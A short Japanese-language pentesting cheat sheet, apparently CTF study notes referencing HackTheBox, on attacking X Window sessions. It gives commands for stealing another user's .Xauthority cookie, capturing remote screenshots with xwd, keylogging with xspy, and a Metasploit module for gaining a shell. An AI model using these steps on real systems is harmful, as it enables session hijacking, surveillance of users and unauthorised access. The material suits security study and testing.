Skip to content

x window system

X Windows Systemまわりを攻めるときのまとめ。

ログインしているユーザ一覧

どちらのコマンドも、上段がSSHアクセスのセッション、下段がGUI表示のセッションである。

Terminal window
$ w
16:31:36 up 10 min, 2 users, load average: 0.16, 0.03, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
mmash pts/0 10.0.0.1 16:21 0.00s 0.86s 0.01s w
mmash tty7 :0 16:31 10:15 0.77s 0.20s xfce4-session
$ who
mmash pts/0 2023-01-22 16:21 (10.0.0.1)
mmash tty7 2023-01-22 16:31 (:0)

.Xauthorityファイル

Xセッションの認証のためのxauthで使用されるクッキー内のクレデンシャルを格納するファイル。 他のユーザの.Xauthorityファイルを窃取することで、Xセッションを乗っ取れる。

環境変数XAUTHORITY

.Xauthorityファイルのパスを環境変数XAUTHORITYに格納することで、以降に紹介するXセッションを操作するコマンドの認証を突破することができる。

Terminal window
$ export XAUTHORITY=/path/to/.Xauthority

xdpinfo

あまり使える情報はないかもしれないけど、XAUTHORITYを設定した状態で認証が通るかどうかはわかる。

Terminal window
$ xdpyinfo -display :0
name of display: :0
version number: 11.0
vendor string: The X.Org Foundation
vendor release number: 12101005
X.Org version: 1.21.1.5
maximum request size: 16777212 bytes
motion buffer size: 256
bitmap unit, bit order, padding: 32, LSBFirst, 32
image byte order: LSBFirst
number of supported pixmap formats: 7
...

xwininfo

起動しているウィンドウ一覧が出力される。ThunarはKaliに搭載されているファイルエクスプローラーの名前らしい。

Terminal window
$ xwininfo -root -tree -display :0
...
0x1400007 "Documents - Thunar": ("Thunar" "Thunar") 640x480+5+31 +520+315
...

HackTheBoxのSquashedではxwininfoコマンドを叩いた結果が手掛かりになることがあった。

xwd

指定したディスプレイのスクリーンショットを撮る。 出力された.xwdファイルは。imagemagickパッケージのconvertコマンドでpngに変換できる。

Terminal window
$ xwd -root -screen -silent -display <target_addr:0> > screenshot.xwd
$ convert screenshot.xwd screenshot.png

Keylogging

Terminal window
$ xspy <display_number>

Shell奪取

Terminal window
msf> use exploit/unix/x11/x11_keyboard_exec

reference